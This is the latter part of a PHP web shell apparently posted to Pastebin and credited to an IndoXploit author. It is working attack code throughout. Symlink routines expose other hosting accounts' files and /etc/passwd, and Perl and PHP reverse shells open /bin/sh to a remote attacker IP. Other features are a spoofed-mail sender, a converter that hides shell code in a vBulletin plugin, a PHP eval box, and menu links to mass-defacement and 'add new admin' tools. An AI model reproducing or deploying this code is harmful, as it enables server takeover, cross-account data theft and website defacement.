  2667.     }
  2668.     if(isset($_GET['sym']) && $_GET['sym']=="dasym"){
  2669.        
  2670.     if(@file_exists("/etc/virtual/domainowners")){
  2671. @mkdir('sym',0777);
  2672. $ht = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2673. $htfile =@fopen ('sym/.htaccess','w');
  2674. fwrite($htfile ,$ht);
  2675. @symlink('/','sym/root');
  2676. fclose($htfile);
  2677. $res = @file("/etc/virtual/domainowners");
  2678. $count=1;
  2679. echo "<br>";
  2680. echo "<table align='center' width='40%' class='syms'>
  2681. <td><font color=\"#FFFFFF\"><b><center># Count</center></font></b></td>
  2682. <td><font color=\"#FFFFFF\"><b><center>Domains</center></font></b></td>
  2683. <td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>
  2684. <td><font color=\"#FFFFFF\"><b><center>symlink</center></font></b></td>";
  2685. foreach($res as $hid){
  2686. if(@eregi(":",$hid)){
  2687. $exfile = explode(':', $hid);
  2688. echo "<tr><td><font color=\"#FFFFFF\">{$count}</font></td><td><a target='_blank' href=http://www.".trim($exfile[0]).'/><font color=\"#FFFFFF\"><b>'.trim($exfile[0]).'</b> </font></a></td><td><font color="white"><b>'.trim($exfile[1])."</font></b></td><td><a href='sym/root/home/".trim($exfile[1])."/public_html' target='_blank'><font color=\"#FF0000\">symlink </font></a></td></tr>";flush();
  2689. $count++;}}echo "</table>";}else{echo '<center><br><font color="#FFFFFF">This is Server Cpanel Please Use </font><font color="#FF0000"><a href="?action=sym&sym=dusym">Symlink for Cpanel</a></font></b><br></center>';}
  2690.  
  2691.     }
  2692.     if(isset($_GET['sym']) && $_GET['sym']=="dsym"){
  2693.  
  2694.  
  2695. if(!@file_exists("/etc/virtual/domainowners")){
  2696. echo "<center>";
  2697. echo "<br>";
  2698. $d0mains = @file("/etc/named.conf");
  2699. if(!$d0mains){
  2700.  
  2701. echo "<b><font color=\"#FFFFFF\">Cant access /etc/named.conf on server</b></font></center>"; }
  2702. echo "<br><table align='center' width='40%' class='syms'><td><font color=\"#FFFFFF\"><b><center>#Count</center></font></b></td><td><font color=\"#FFFFFF\"><b><center>Domains</center></font></b></td><td><font color=\"#FFFFFF\"><b><center>Users</center></font></b></td>";
  2703. $count=1;
  2704. if (is_array($d0mains) || is_object($d0mains))
  2705. {
  2706. foreach($d0mains as $d0main){
  2707. if(@eregi("zone",$d0main)){
  2708. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2709. flush();
  2710. if(strlen(trim($domains[1][0])) > 2){
  2711. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2712. echo "<tr><td><b><font color=\"#FFFFFF\">".$count."</b></font></td><td><a href=http://www.".$domains[1][0]."/><font color=\"#FFFFFF\"><b>".$domains[1][0]."</font></b></a></td><td><b><font color=\"#FFFFFF\">".$user['name']."</font></b></td></tr>";flush();
  2713. $count++;
  2714. }}}
  2715. }
  2716. echo "</center></table>";
  2717. }else{echo '<center><br><font color="#FFFFFF">This  Server is DirectAdmin Please Use </font><font color="#FF0000"><a href="?action=sym&sym=dasym">Symlink for Direct Admin</a></font> </center>';}
  2718.  
  2719.  
  2720.     }
  2721.     if(isset($_GET['sym']) && $_GET['sym']=="passwd"){
  2722.        
  2723.    
  2724. @mkdir('sym',0777);
  2725. $htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  2726. $f =@fopen ('sym/.htaccess','w');
  2727. fwrite($f , $htcs);
  2728.  
  2729.  
  2730.  
  2731. @symlink("/","sym/root");
  2732.  
  2733. $pg = basename(__FILE__);
  2734.  
  2735.    
  2736.     if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  2737.  
  2738.  
  2739. $cont = stripcslashes($_POST['file']);
  2740.  
  2741. if(!file_exists('passwd.txt')){
  2742.  
  2743. $f = @fopen('passwd.txt','w');
  2744.  
  2745. $w = @fwrite($f,$cont);
  2746.  
  2747. fclose($f);
  2748. }
  2749. if($w or @filesize('passwd.txt') > 0){
  2750.  
  2751. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  2752. flush();
  2753.  
  2754. $fil3 = file('passwd.txt');
  2755.  
  2756. foreach ($fil3 as $f){
  2757.  
  2758.      $u=explode(':', $f);
  2759.      $user = $u['0'];
  2760.  
  2761.  
  2762.  
  2763. echo "
  2764. <tr>
  2765.  
  2766.  
  2767.  
  2768. <td width='15%'>
  2769. $user
  2770. </td>
  2771. <td width='10%'>
  2772. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  2773. </td>
  2774.  
  2775. <td width='10%'>
  2776. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  2777. </td>
  2778.  
  2779.  
  2780.  
  2781. </tr></div> ";
  2782.  
  2783.  
  2784. flush();
  2785. flush();
  2786.  
  2787.  
  2788. }
  2789.  
  2790.  
  2791.  
  2792.  
  2793.  
  2794.  
  2795. die ("</tr></div>");
  2796.  
  2797.  
  2798.                   }
  2799.  
  2800.  
  2801.  
  2802.  
  2803.  
  2804. }
  2805.  
  2806.  
  2807.  
  2808. echo "<center>Read /etc/passwd";
  2809. echo "<br /><br /><form method='post' action='?action=sym&sym=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  2810. flush();
  2811.  
  2812. $file = '/etc/passwd';
  2813.  
  2814.  
  2815. $r3ad = @fopen($file, 'r');
  2816. if ($r3ad){
  2817. $content = @fread($r3ad, @filesize($file));
  2818. echo "".htmlentities($content)."";
  2819. }
  2820. elseif(!$r3ad)
  2821. {
  2822. $r3ad = @show_source($file) ;
  2823. }
  2824. elseif(!$r3ad)
  2825. {
  2826. $r3ad = @highlight_file($file);
  2827. }
  2828. elseif(!$r3ad)
  2829. {
  2830.  
  2831.                                             for($uid=0;$uid<1000;$uid++){
  2832.                                              $ara = posix_getpwuid($uid);
  2833.                                                if (!empty($ara)) {
  2834.                                                   while (list ($key, $val) = each($ara)){
  2835.                                                     print "$val:";
  2836.                                                   }
  2837.                                                   print "\n";
  2838.                                                  }
  2839.  
  2840.                                         }
  2841.  
  2842.  }
  2843.  
  2844.  
  2845. flush();
  2846.  
  2847.  
  2848. echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form></center>";
  2849. flush();
  2850.     }
  2851.    
  2852.     if(isset($_GET['sym']) && $_GET['sym']=="fsym"){
  2853.    
  2854.     echo'<center>The file path to symlink :
  2855.  
  2856. <br /><br />
  2857.  
  2858. <form method="post" action="?action=sym&sym=fsym">
  2859. <input type="text" name="file" value="/home/user/public_html/[File Name]" size="60"/><br /><br />
  2860. <input type="text" name="symfile" value="sym.txt" size="60"/><br /><br />
  2861. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  2862. </form>
  2863. </center>
  2864. ';
  2865.  
  2866. if(isset($_POST['file']) && isset($_POST['symfile']) & isset($_POST['symlink'])){
  2867. $path_file = $_POST['file'];
  2868. $symfile = $_POST['symfile'];
  2869. $symlink = $_POST['symlink'];
  2870.  
  2871. if ($symlink)
  2872. {
  2873. @mkdir('symlink',0777);
  2874. $c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n";
  2875. $f =@fopen ('symlink/.htaccess','w');
  2876. @fwrite($f , $c);
  2877. @symlink("$path_file","symlink/$symfile");
  2878. echo '<br /><a target="_blank" href="symlink/'.$symfile.'" >'.$symfile.'</a>';
  2879. }
  2880.        
  2881. }
  2882.        
  2883.     }
  2884.        
  2885.     }
  2886.     if($action=="zipper"){
  2887.     if (class_exists('ZipArchive')){
  2888. echo '
  2889. <center>
  2890. <br /><br />
  2891. <form actoin="?action=zipper&dir='.$path.'#down" method="post">
  2892. <a name="down"></a>
  2893. <font color="#FFFFFF"><b>Dir:</b> </font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['path']).'" size="60"/><br /><br />
  2894. <font color="#FFFFFF"><b>Save Dir: </b></font><input type="text" name="zipfile" value="ashiyane.zip" size="60"/><br /><br />
  2895. <input type="submit" value=">>" name="ziper" /> <br /><br />
  2896. </form></center>
  2897. ';
  2898.  
  2899.  
  2900. $code = base64_decode('ICAgIGlmICghZXh0ZW5zaW9uX2xvYWRlZCgnemlwJykgfHwgIWZpbGVfZXhpc3RzKCRzb3VyY2UpKSB7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICAkemlwID0gbmV3IFppcEFyY2hpdmUoKTsNCiAgICBpZiAoISR6aXAtPm9wZW4oJGRlc3RpbmF0aW9uLCBaSVBBUkNISVZFOjpDUkVBVEUpKSB7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICAkc291cmNlID0gc3RyX3JlcGxhY2UoJ1xcJywgJy8nLCByZWFscGF0aCgkc291cmNlKSk7DQoNCiAgICBpZiAoaXNfZGlyKCRzb3VyY2UpID09PSB0cnVlKQ0KICAgIHsNCiAgICAgICAgJGZpbGVzID0gbmV3IFJlY3Vyc2l2ZUl0ZXJhdG9ySXRlcmF0b3IobmV3IFJlY3Vyc2l2ZURpcmVjdG9yeUl0ZXJhdG9yKCRzb3VyY2UpLCBSZWN1cnNpdmVJdGVyYXRvckl0ZXJhdG9yOjpTRUxGX0ZJUlNUKTsNCg0KICAgICAgICBmb3JlYWNoICgkZmlsZXMgYXMgJGZpbGUpDQogICAgICAgIHsNCiAgICAgICAgICAgICRmaWxlID0gc3RyX3JlcGxhY2UoJ1xcJywgJy8nLCAkZmlsZSk7DQoNCiAgICAgICAgICAgIC8vIElnbm9yZSAiLiIgYW5kICIuLiIgZm9sZGVycw0KICAgICAgICAgICAgaWYoIGluX2FycmF5KHN1YnN0cigkZmlsZSwgc3RycnBvcygkZmlsZSwgJy8nKSsxKSwgYXJyYXkoJy4nLCAnLi4nKSkgKQ0KICAgICAgICAgICAgICAgIGNvbnRpbnVlOw0KDQogICAgICAgICAgICAkZmlsZSA9IHJlYWxwYXRoKCRmaWxlKTsNCg0KICAgICAgICAgICAgaWYgKGlzX2RpcigkZmlsZSkgPT09IHRydWUpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgJHppcC0+YWRkRW1wdHlEaXIoc3RyX3JlcGxhY2UoJHNvdXJjZSAuICcvJywgJycsICRmaWxlIC4gJy8nKSk7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlbHNlIGlmIChpc19maWxlKCRmaWxlKSA9PT0gdHJ1ZSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAkemlwLT5hZGRGcm9tU3RyaW5nKHN0cl9yZXBsYWNlKCRzb3VyY2UgLiAnLycsICcnLCAkZmlsZSksIGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlKSk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQogICAgZWxzZSBpZiAoaXNfZmlsZSgkc291cmNlKSA9PT0gdHJ1ZSkNCiAgICB7DQogICAgICAgICR6aXAtPmFkZEZyb21TdHJpbmcoYmFzZW5hbWUoJHNvdXJjZSksIGZpbGVfZ2V0X2NvbnRlbnRzKCRzb3VyY2UpKTsNCiAgICB9DQoNCiAgICByZXR1cm4gJHppcC0+Y2xvc2UoKTs=');
  2901.  
  2902.  
  2903.    
  2904. if(isset($_POST['ziper']) && ($_POST['ziper'] == '>>'))
  2905. {
  2906. $newfunc = create_function('$source,$destination', $code);
  2907.  
  2908. $dirzip = $_POST['dirzip'];
  2909. $zipfile = $_POST['zipfile'];
  2910. if($newfunc($dirzip, $zipfile)){
  2911. echo '<b><span style="color:green">Directory Or File Ziped Successfully !</span></b><Br>';
  2912. }else {echo '<b><span style="color:red">Error!!!...</span></b><Br>';}
  2913. }
  2914. }
  2915. else {
  2916. echo '
  2917. <center>
  2918. <br /><br />
  2919. <form action="?action=zipper&dir='.$path.'#down" method="post">
  2920. <a name="down"></a>
  2921. Dir:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['path']).'" size="60"/><br /><br />
  2922. Save Dir: <input type="text" name="zipfile" value="ashiyane.zip" size="60"/><br /><br />
  2923. <input type="submit" value=">>" name="ziper" /> <br /><br />
  2924. </form></center>
  2925. ';
  2926. if(isset($_POST['ziper']) && ($_POST['ziper'] == '>>'))
  2927.  
  2928. {
  2929. $dirzip = trim($_POST['dirzip']);
  2930. $zipfile = trim($_POST['zipfile']);
  2931. if(exec("zip -r $zipfile $dirzip")){
  2932. echo '<b><span style="color:green">Directory Or File Ziped Successfully !</span></b><br>';
  2933. }else {echo '<b><span style="color:red">ERROR!!!...</span></b><br>';}
  2934. }
  2935. }  
  2936.     }
  2937.    
  2938.     if($action=="fakemail"){
  2939.    
  2940.     echo '
  2941. <center><form action="?action=fakemail&dir='.$path.'#down" method="post">
  2942. <a name="down"></a>
  2943. <table>
  2944. <tr>
  2945. <td>
  2946. <font color="#FFF"><b>Mail to : </b></font></td><td><input placeholder="Victim" size="30" type="email" name="mailto" />
  2947. </td>
  2948. </tr>
  2949. <tr>
  2950. <td>
  2951. <font color="#FFF"><b>From : </b></font></td><td><input type="email" size="30"  placeholder="Hacker@mail.com" name="mailfrom" />
  2952. </td>
  2953. </tr>
  2954. <tr>
  2955. <td>
  2956. <font color="#FFF"><b>Subject : </b></font></td><td><input type="text" size="30"  value="Your Site Has Been Hacked" name="mailsubject" />
  2957. </td>
  2958. </tr>
  2959. </table><br>
  2960. <textarea rows="6" cols="60" name="mailcontent">Hi Admin :)</textarea>
  2961. <br><input type="submit" value=">>" name="mailsend" />
  2962. </form></center><br><br>';
  2963. if(isset($_POST['mailsend']) && ($_POST['mailsend'] == '>>'))
  2964. {
  2965. $mailto = $_POST['mailto'];
  2966. $mailfrom = $_POST['mailfrom'];
  2967. $mailsubject = $_POST['mailsubject'];
  2968. $mailcontent = $_POST['mailcontent'];
  2969. if(@mail($mailto,$mailsubject,$mailcontent,"FROM:$mailfrom"))
  2970. { echo '<center><span style="color:green"><b>Mail successfully Sent!</b></span></center>'; }
  2971. else echo '<center><span style="color:red"><b>Mail Not Sent!</b></span></center>';
  2972. }
  2973.  
  2974.        
  2975.     }
  2976.    
  2977.     if($action=="php2xml"){
  2978.        
  2979.         echo"
  2980. <center>
  2981. <b><font>Convert PHP To XML For Vbulletin Shell</font></b>
  2982. <form action=\"?action=php2xml&dir=$path#down\" method='post'>
  2983. <a name=\"down\"></a>
  2984. <p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
  2985. <input type='submit' name='go' value='Convert' />&nbsp;&nbsp;<input type='reset' value='Clear' name='reset'><br/><br/>
  2986. </p>
  2987. </form></center>";
  2988. if(isset($_POST['go']) && $_POST['go'] == 'Convert' ) {
  2989. if ( get_magic_quotes_gpc() ){
  2990. $code=stripslashes($_POST['code']);
  2991. }
  2992. else{
  2993. $code=$_POST['code'];
  2994. }
  2995. $code = 'base64_decode('.$code.')';
  2996. $head = '<?xml version="1.0" encoding="ISO-8859-1"?>
  2997.  
  2998. <plugins>
  2999.     <plugin active="1" product="vbulletin">
  3000.         <title>vBulletin</title>
  3001.         <hookname>init_startup</hookname>
  3002.         <phpcode><![CDATA[if (strpos($_SERVER["PHP_SELF"],"subscriptions.php")) {';
  3003. $foot = 'exit;
  3004. }]]></phpcode>
  3005.     </plugin>
  3006. </plugins>';
  3007. echo"<br/><center><textarea rows='10' name='users' cols='80' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>";
  3008. echo $head.'base64_decode(\''.base64_encode($code).'\');'.$foot;
  3009. echo '</textarea></center><br>';
  3010. }
  3011. echo '</center></div>';
  3012.        
  3013.     }
  3014.     if($action=="bc"){
  3015.         echo "<style>#bc{background: #A81F1F}</style>";
  3016.        
  3017. $back_connect_p='#!/usr/bin/perl
  3018. use Socket;
  3019. $iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
  3020. $paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
  3021. $proto=getprotobyname("tcp");
  3022. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  3023. connect(SOCKET, $paddr) || die("Error: $!\n");
  3024. open(STDIN, ">&SOCKET");
  3025. open(STDOUT, ">&SOCKET");
  3026. open(STDERR, ">&SOCKET");
  3027. system("/bin/sh -i");
  3028. close(STDIN);
  3029. close(STDOUT);
  3030. close(STDERR);
  3031. ';
  3032.  
  3033. echo "<center><h3><span>Back Connect</span></h3>";
  3034. echo "<form method=\"post\" action=\"?action=bc&dir=$path#down\">
  3035. <input type=\"hidden\" name=\"type\" value=\"perl\">
  3036. <span>PERL BACK CONNECT<br></span><br><b>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'>
  3037. Port: <input type='number' name='port' value='443' min='1' max='65535'><input type=submit name=bc value='>>'></form></b>";
  3038.  
  3039.  
  3040. echo "<br><form method=\"post\" action=\"?action=bc&dir=$path#down\">
  3041. <input type=\"hidden\" name=\"type\" value=\"php\">
  3042. <span>PHP BACK CONNECT<br></span><br><b>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'>
  3043. Port: <input type='number' name='port' value='443' min='1' max='65535'> <input type=submit name=bc value='>>'></form><br>";
  3044.  
  3045. if(isset($_POST['type'])) {
  3046. function cf($f,$t) {
  3047. $w = @fopen($f,"w") or @function_exists('file_put_contents');
  3048. if($w){
  3049. @fwrite($w,$t);
  3050. @fclose($w);
  3051. }
  3052. }
  3053.  
  3054. if($_POST['type'] == 'perl') {
  3055. cf("/tmp/bc.pl",$back_connect_p);
  3056. $out = extension("perl /tmp/bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
  3057. echo "<span style=\"color:green\"><br>Successfully opened reverse shell to ".htmlspecialchars($_POST['server']).":".htmlspecialchars($_POST['port'])."<br>Connecting...[Perl]</span>";
  3058. @unlink("/tmp/bc.pl");
  3059. }
  3060.  
  3061. if($_POST['type']=='php')
  3062. {
  3063. @set_time_limit (0);
  3064. $ip = htmlspecialchars($_POST['server']);
  3065. $port = htmlspecialchars($_POST['port']);
  3066. $chunk_size = 1400;
  3067. $write_a = null;
  3068. $error_a = null;
  3069. $shell = 'uname -a; w; id; /bin/sh -i';
  3070. $daemon = 0;
  3071. $debug = 0;
  3072. if (function_exists('pcntl_fork')) {
  3073. $pid = pcntl_fork();
  3074. if ($pid == -1) {
  3075. echo "Cant fork!<br>";
  3076. exit(1);
  3077. }
  3078. if ($pid) {
  3079. exit(0);
  3080. }
  3081. if (posix_setsid() == -1) {
  3082. echo "<span style=\"color:red\"><br>Error: Can't setsid()</span><br>";
  3083. exit(1);
  3084. }
  3085. $daemon = 1;
  3086. } else {
  3087. echo "<span style=\"color:red\"><br>WARNING: Failed to daemonise. This is quite common and not fatal<br></span>";
  3088. }
  3089. chdir(htmlspecialchars($GLOBALS['path']));
  3090. umask(0);
  3091. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  3092. if (!$sock) {
  3093. echo "$errstr ($errno)";
  3094. exit(1);
  3095. }
  3096. $descriptorspec = array(
  3097. 0 => array("pipe", "r"),
  3098. 1 => array("pipe", "w"),
  3099. 2 => array("pipe", "w")
  3100. );
  3101. $process = proc_open($shell, $descriptorspec, $pipes);
  3102. if (!is_resource($process)) {
  3103. echo "ERROR: Can't spawn shell<br>";
  3104. exit(1);
  3105. }
  3106. @stream_set_blocking($pipes[0], 0);
  3107. @stream_set_blocking($pipes[1], 0);
  3108. @stream_set_blocking($pipes[2], 0);
  3109. @stream_set_blocking($sock, 0);
  3110. echo "<span style=\"color:green\"><br>Successfully opened reverse shell to $ip:$port [Php]</span><br>";
  3111. while (1) {
  3112. if (feof($sock)) {
  3113. echo "<span style=\"color:red\"><br>ERROR: Shell connection terminated</span><br>";
  3114. break;
  3115. }
  3116. if (feof($pipes[1])) {
  3117. echo "<span style=\"color:red\"><br>ERROR: Shell process terminated</span><br>";
  3118. break;
  3119. }
  3120. $read_a = array($sock, $pipes[1], $pipes[2]);
  3121. $num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null);
  3122. if (in_array($sock, $read_a)) {
  3123. if ($debug) echo "SOCK READ<br>";
  3124. $input=fread($sock, $chunk_size);
  3125. if ($debug) echo "SOCK: $input<br>";
  3126. fwrite($pipes[0], $input);
  3127. }
  3128. if (in_array($pipes[1], $read_a)) {
  3129. if ($debug) echo "STDOUT READ<br>";
  3130. $input = fread($pipes[1], $chunk_size);
  3131. if ($debug) echo "STDOUT: $input<br>";
  3132. fwrite($sock, $input);
  3133. }
  3134. if (in_array($pipes[2], $read_a)) {
  3135. if ($debug) echo "STDERR READ<br>";
  3136. $input = fread($pipes[2], $chunk_size);
  3137. if ($debug) echo "STDERR: $input<br>";
  3138. fwrite($sock, $input);
  3139. }
  3140. }
  3141. fclose($sock);
  3142. fclose($pipes[0]);
  3143. fclose($pipes[1]);
  3144. fclose($pipes[2]);
  3145. proc_close($process);
  3146. echo "</pre>";
  3147. }
  3148. }  
  3149.        
  3150.     }
  3151.  
  3152.      if($action=="othertools"){
  3153.          echo "<style>#othertools{background: #A81F1F}</style>";
  3154.          ?>
  3155.         <table>
  3156.         <tr>
  3157.         <td><a href="?action=zoneh&dir=<?php echo $path;?>" title="ZONE-H MASS DEFACE POSTER"><input type="button" value="ZONE-H" onclick=""></a><td>
  3158.         <td><a href="?action=mass&dir=<?php echo $path;?>"><input type="button" value="MASS DEFACER" onclick=""></a><td>
  3159.         <td><a href="?action=zipper&dir=<?php echo $path;?>"><input type="button" value="ZIPPER" onclick=""></a><td>
  3160.         <td><a href="?action=fakemail&dir=<?php echo $path;?>"><input type="button" value="FAKE MAIL" onclick=""></a><td>
  3161.         <td><a href="?action=php2xml&dir=<?php echo $path;?>"><input type="button" value="PHP TO XML" onclick=""></a><td>
  3162.         <td><a href="?action=disfunc&dir=<?php echo $path;?>"><input type="button" value="BYPASSER" onclick=""></a><td>
  3163.         <td><a href="?action=pwchanger&dir=<?php echo $path;?>"><input type="button" value="ADD NEW ADMIN" onclick=""></a><td>
  3164.         <td><a href="?action=cloudflare&dir=<?php echo $path;?>"><input type="button" value="CLOUD FLARE BYPASSER" onclick=""></a><td>
  3165.         <td><a href="?action=info&dir=<?php echo $path;?>"><input type="button" value="PHP INFO" onclick=""></a><td>
  3166.         </tr>
  3167.        
  3168.          <?php
  3169.      }
  3170.    
  3171.     if($action=="eval"){
  3172.         echo "<style>#eval{background: #A81F1F}</style>";
  3173.         ?><center>
  3174.         <span style="font-size:20px;"><b>PHP Eval</b></span>
  3175.     <a name="down"></a><form action="?action=eval&dir=<?php echo $path;?>#down" method="post">
  3176. <table><tr><td>
  3177.  
  3178. <textarea name="eval" style="width:1000px;height:300px;border: 2px solid #CE3F3F;">
  3179. <?php
  3180. if(isset($_POST['submiteval'])) {
  3181.     echo eval(magicboom($_POST['eval']));}
  3182.     else{
  3183.         echo "echo file_get_contents('/etc/passwd');";
  3184. }
  3185. ?>
  3186. </textarea>
  3187. </td></tr>
  3188. <tr><td>
  3189. <input type="submit" value="Run !" name="submiteval" />
  3190. </td></tr>
  3191.  
  3192. </table></form>
  3193. </center>
  3194.  
  3195.         <?php
  3196.     }
  3197.     if($action=="logout"){
  3198.         ?>
  3199.         <form action="?action=logout" method="post">
  3200.         <span>Sayonara senpai !! watashi sukidayo.!!</span>
  3201.         <input type="submit" value="Yes" name="accept" style="cursor: pointer"/>
  3202.         <input type="button" value="No" onclick="window.location.href='?action=explorer'" style="cursor: pointer">
  3203.         </form>
  3204.        
  3205.     <?php  
  3206. if(isset($_POST['accept']) && $_POST['accept'] != "" && $_POST['accept']=="Yes"){
  3207. unset($_SESSION[$_SERVER['HTTP_HOST']]);
  3208. header("location: ?action=explorer");  
  3209.     }  
  3210.     }
  3211. }
  3212. //Coded By Itsuka VrCy ~ IndoXploit Magelang
  3213. ?>
  3214.             <div class="clear">
  3215.             </div>
  3216.             </div>
  3217.            
  3218.         </div>
  3219.     </body>
  3220. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top